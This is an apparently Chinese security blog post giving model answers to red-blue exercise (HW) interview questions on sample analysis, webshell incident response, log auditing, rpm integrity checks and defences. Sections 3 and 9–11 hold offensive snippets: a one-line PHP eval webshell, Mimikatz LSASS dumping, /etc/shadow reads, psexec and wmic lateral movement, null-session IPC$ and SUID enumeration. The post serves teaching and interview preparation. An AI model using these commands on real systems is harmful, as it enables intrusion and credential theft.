安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。、

目录

 2025年HW(护网面试) 29

1. 样本分析思路

2. Linux GDB分析样本示例

3. 应急案例：WebShell后门排查

4. 日志审计重点

5. 命令被替换检测方法

6. RPM校验参数

7. APT研究经验

8. 常见漏洞分析方向

9. 内网漫游思路

10. 横向移动与IPC$

11. 权限提升方法

防御建议

 2025年HW(护网面试) 29

1、如何做的样本分析，思路是什么
2、如何用linuxgdb分析一个简单样本
3、再举一个你的其他应急的例子(我举的是挖矿病毒)
4、日志你看的是什么日志，web服务器日志嘛
5、某些命令被替换了，如何发现
6、rpm有个参数就可以校验命令是否被替换，是什么
7、是否做过APT相关的研究
8、如何分析windows，linux，web一些常见的漏洞
9、内网突破到内网漫游的思路
10、如何横向、IPC了解过嘛，横向原理
11、权限提升（windows，linux）

1. 样本分析思路

方法论框架：

mermaidgraph LR A[静态分析] --> A1[文件格式识别] A --> A2[字符串提取] A --> A3[熵值检测加壳] B[动态分析] --> B1[沙箱行为监控] B --> B2[API调用跟踪] C[关联分析] --> C1[威胁情报匹配] C --> C2[攻击链重构]

关键步骤：

• 静态分析：使用file、strings、binwalk识别文件结构；PEiD查壳；YARA规则扫描特征
• 动态分析：在隔离环境中运行，用Sysinternals Suite(Windows)或strace(Linux)监控进程/注册表/网络
• 内存取证：Volatility提取注入代码或隐藏进程
• 逆向工程：IDA Pro/Ghidra反编译关键函数

---

2. Linux GDB分析样本示例

场景：分析ELF文件堆栈溢出漏洞

bash# 编译时加入调试信息 gcc -g -fno-stack-protector vuln.c -o vuln # GDB调试步骤 gdb ./vuln (gdb) break main # 主函数断点 (gdb) run < payload # 触发漏洞 (gdb) x/100x $esp # 检查栈内存 (gdb) info registers # 查看寄存器值 (gdb) backtrace # 崩溃调用栈 (gdb) disassemble # 反汇编当前函数

关键技巧：

• checksec检查保护机制（ASLR/NX/CANARY）
• pattern create & pattern offset定位溢出点

---

3. 应急案例：WebShell后门排查

攻击链：

SQL注入 → 写入WebShell → 内网扫描 → 数据外传  

响应过程：

1. 检测：
   • Web日志发现/uploads/.test.php 异常访问（HTTP 200 for POST请求）
   • 文件内容：<?php @eval($_POST['cmd']);?>
2. 遏制：
   • 隔离服务器，禁用Apache账户网络权限
3. 溯源：
   • 日志关联：攻击IP来自TOR出口节点
   • 文件创建时间匹配此前SQL注入日志
4. 加固：
   • 目录禁止执行权限：chmod -R o-x /var/www/uploads
   • 部署WAF规则拦截eval(等危险函数

---

4. 日志审计重点

核心日志类型：

日志类型	分析工具	关键事件
Web访问日志	GoAccess/AWStats	异常路径访问、高频500错误
系统认证日志	journalctl/rsyslog	非办公时间登录、root暴力破解
进程执行日志	auditd (Linux)	未知二进制执行、敏感命令调用
PowerShell日志	Windows事件4662	混淆代码执行、远程下载

---

5. 命令被替换检测方法

Linux检测步骤：

1. HASH校验：

   bash# 查询系统命令的原始HASH rpm -Vf /bin/ls # 输出示例：S.5....T. /bin/ls (HASH不匹配)

2. 时间戳比对：

   basstat /bin/netstat # 查看修改时间 ls -l /bin # 对比同目录文件时间

3. 完整性工具：
   • aide：创建数据库定期校验
   • tripwire：商业级文件监控

Windows检测：

• sigcheck -v -a C:\Windows\System32\cmd.exe （Sysinternals工具）

---

6. RPM校验参数

命令：

bashrpm -Va # 校验所有已安装包 rpm -Vf /usr/bin/ssh # 校验指定命令 

输出标识解析：

• S：文件大小改变
• 5：MD5校验失败
• T：修改时间变化
• U：用户权限变更

---

7. APT研究经验

分析重点：

• 初始入侵：鱼邮件附件（CVE-2017-11882）、水坑攻击
• 持久化：Windows计划任务、Linux crontab
• C2通信：
  • DNS隧道（检测异常NXDOMAIN请求）
  • HTTPS证书不匹配（JA3指纹异常）
• 数据渗出：图片隐写、Cloud Storage API滥用

工具链：

• 网络流量：Suricata + ELK
• 端点行为：Osquery + Kolide Fleet
• 内存分析：Rekall

---

8. 常见漏洞分析方向

跨平台漏洞矩阵：

平台	漏洞类型	分析工具
Web	SQL注入/XSS	Burp Suite, SQLMap
Linux	内核提权(CVE-2021-4034)	checksec, lynis
Windows	永恒之蓝(MS17-010)	Nessus, Impacket
云环境	桶策略错误	ScoutSuite, Pacu

---

9. 内网漫游思路

渗透路径：

mermaidgraph TB A[边界突破] --> B[主机发现] B --> C[凭证窃取] C --> D[横向移动] D --> E[权限提升] E --> F[域控夺取]

技术细节：

• 主机发现：nmap -sn 192.168.1.0/24
• 凭证窃取：
  • Windows：Mimikatz抓取LSASS内存
  • Linux：搜索.bash_history或/etc/shadow
• 横向移动：
  • SMB协议：psexec.py admin@192.168.1.10
  • WMI远程执行：wmic /node:192.168.1.2 process call create "cmd.exe"

---

10. 横向移动与IPC$

IPC$原理：

• 通过空会话（Null Session）访问远程主机的命名管道
• 利用方式：

  bashnet use \\192.168.1.5\IPC$ "" /u:"" # 建立空连接 enum4linux -a 192.168.1.5 # 枚举信息 

防御措施：

• 组策略禁用匿名枚举：RestrictAnonymous=1
• 防火墙阻断135-139/445端口

---

11. 权限提升方法

Windows提权：

• 服务路径漏洞：

  powershellsc qc VulnSvc # 检查可写服务路径 

• 令牌窃取：incognito.exe 模拟SYSTEM令牌
• AlwaysInstallElevated：利用MSI安装包提权

Linux提权：

• SUID滥用：

  bashfind / -perm -4000 2>/dev/null # 查找SUID文件 

• 内核漏洞：dirtypipe（CVE-2022-0847）利用脚本
• sudo配置错误：sudo -l 查看可免密执行命令

---

防御建议

1. Linux：定期运行rpm -Va校验系统文件
2. Windows：启用LSA保护防止Mimikatz
3. 日志统一：部署SIEM集中分析（如Splunk/QRadar）
4. 最小权限：所有服务使用低权账户运行